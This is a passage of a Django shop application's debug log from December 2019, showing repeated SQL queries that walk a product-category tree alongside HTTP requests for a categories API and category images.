08:16:15,989 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 08:16:15,991 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 08:16:15,994 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 08:16:15,996 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 08:16:15,999 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 08:16:16,003 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 08:16:16,006 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 08:16:16,008 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 08:16:16,011 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 08:16:16,013 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 08:16:16,017 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 08:16:16,019 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 08:16:16,022 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 08:16:16,024 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 08:16:16,027 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 08:16:16,031 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 08:16:16,033 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 08:16:16,036 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 08:16:16,038 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 08:16:16,041 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 08:16:16,043 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 08:16:16,047 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 08:16:16,050 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 08:16:16,052 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 08:16:16,055 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 08:16:16,057 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 08:16:16,061 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 08:16:16,063 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 08:16:16,066 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 08:16:16,068 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 08:16:16,071 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 08:16:16,075 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 08:16:16,077 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 08:16:16,080 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 08:16:16,082 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 08:16:16,085 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 08:16:16,087 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 08:16:16,090 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 08:16:16,093 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 08:16:16,095 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 08:16:16,099 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 08:16:16,101 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 08:16:16] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:17] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [18/Dec/2019 08:16:18] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-18 08:18:35,716 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 08:18:35,729 utils 4252 140031747061504 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 08:18:35,737 utils 4252 140031721535232 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 08:18:35,745 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 08:18:35,749 utils 4252 140031747061504 (0.012) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 08:18:35,752 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 08:18:35,757 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 08:18:35,760 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [18/Dec/2019 08:18:35] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 08:18:35,765 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 08:18:35,769 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 08:18:35,772 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 08:18:35,776 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 08:18:35,779 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 08:18:35,781 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 08:18:35,784 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 08:18:35,787 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 08:18:35,791 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 